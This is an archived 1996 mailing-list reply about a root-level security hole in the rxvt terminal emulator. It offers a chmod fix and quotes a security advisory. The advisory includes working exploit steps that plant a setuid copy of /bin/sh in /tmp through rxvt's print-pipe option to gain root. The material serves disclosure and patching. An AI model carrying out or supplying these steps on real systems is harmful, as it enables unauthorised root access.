[Prev][Next][Index]

Re: [Fwd: SECURITY: rxvt security hole]



I think it's fair to release a fix with such a thing.

The fix is:

# find / -name rxvt -print
/usr/X11/bin/rxvt
/other/possible/locations/rxvt
# chmod -s /usr/X11/bin/rxvt
# chmod -s /other/possible/location/rxvt
# ....

This will have one negative effect: if a user opens several rxvts, you 
will not see him logged in more than once.

On Fri, 12 Jan 1996, Gilad Gam wrote:

> Hi,
> 
> This one is a REAL alert, try it and you get root in 30 seconds...
> 
> Gilad.
> 
> 
> David J Meltzer wrote:
> > 
> > -----BEGIN PGP SIGNED MESSAGE-----
> > 
> > [This was recently forwarded over the linux-alert mailing list.  I left
> > the full text of the exploit in this post due to the fact that it is
> > already quite well publicized.  I have not verified the exploit code
> > myself.  --Jeff.]
> > 
> >    There is a major security hole in rxvt, a terminal emulator for X, when it
> > is run on systems suid root, as is required on many configurations in order to
> > write to the utmp file.  It is obvious from the code that this program was
> > not written to be run suid root, its a pity that sysadmins that install the
> > compiled versions of this sort of code don't see the same warnings of 'run
> > suid root at your own risk' that the people that put together a distribution
> > with it that way see in the makefile.
> >    The conditions that allow this particular hole to be exploited is rxvt
> > compiled with the PRINT_PIPE option, and is running suid root.  The program
> > sets the pipe to "lpr", without a pathname, but its even easier than that
> > to exploit because we can set the pipe to whatever we want with the -print-pipe
> > option on the rxvt command line.  Although the programs gives up its root
> > privileges when forking to runn a shell or other command, the original program
> > continues running suid root the entire execution of the program.
> >    Because the popen() call runs as root, whatever program that pipe opens
> > will execute immediately as root.  In order to start the printer pipe, the
> > vt100 printer-on command is ESC[5i.  The pipe can then be closed with the
> > printer-off commad, ESC[4i.  Exploiting this is extremely easy.
> > 
> >                    Program: rxvt
> > Affected Operating Systems: Linux Slackware 3.0, RedHat 2.1, others with
> >                             rxvt suid root (and compiled with PRINT_PIPE)
> >               Requirements: account on system, X server
> >            Temporary Patch: chmod -s /usr/X11R6/bin/rxvt
> >        Security Compromise: root
> >                     Author: Dave M. (davem@cmu.edu)
> >                   Synopsis: rxvt fails to give up root privileges before
> >                             opening a pipe to a program that can be specified
> >                             by the user.
> > 
> > Exploit:
> > 1.  Set DISPLAY environment variable if necessary so you can use x clients.
> > 2.  In user shell:
> >     $ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug
> >     $ chmod +x /tmp/rxbug
> >     $ rxvt -print-pipe /tmp/rxbug
> > 3.  In rxvt xclient:
> >     $ cat
> >       ESC[5i
> >       ESC[4i
> >     (The client will close at this point with a broken pipe)
> > 4.  $ /tmp/rxsh
> >     # whoami
> >     root
> >     #
> > 
> > -----BEGIN PGP SIGNATURE-----
> > Version: 2.6.2
> > Comment: Processed by Mailcrypt 3.2, an Emacs/PGP interface
> > 
> > iQCVAwUBMO1fMXoDqzGe1QXFAQH+jgP+IgtZw9HYoaSd4aLd0PzSH40JSfPtHc+5
> > r3oLGMWxwTrb1f8Dx367LFNwZzvM4QAWkMQ01yjNPFh6fpgMgLPsc2atmn1AWJq+
> > ZFpNxQ6yu6/1chDtSh4XNrdJSAOKSrz6Y3T0N+23uCC2feV78eMqe+Trmq9TxCac
> > r16NALs+Zwo=
> > =BzNN
> > -----END PGP SIGNATURE-----
> > 
> > ------------------------------------------------------------------------
> > The normal moderators for this newsgroup (Matt Welsh and Lars Wirzenius)
> > were bypassed for this announcement; we (Olaf Kirch and Jeff Uphoff)
> > have their implicit approval for security announcements, by prior
> > arrangement.
> > ------------------------------------------------------------------------
> 

--------------------------------------------- ....- --.. ----. -.. --. .
            Arik Baratz, Regularus Studentus, iNTP, 4Z9DGE
---------------------------------------------------------------------------

  "Your conscious mind is very intelligent, and your unconscious mind
     is a hell of a lot smarter than you are."
                                                 - Erickson H. Milton
http://ccarik.technion.ac.il/~arikb